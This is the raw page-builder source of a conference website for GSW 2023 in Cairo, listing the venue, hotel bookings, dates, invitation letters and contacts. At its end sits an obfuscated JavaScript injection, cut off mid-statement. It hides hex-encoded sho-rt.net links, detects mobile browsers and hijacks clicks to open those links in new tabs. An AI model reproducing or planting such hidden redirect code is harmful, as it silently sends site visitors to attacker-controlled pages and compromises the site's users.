!important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687710061920{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 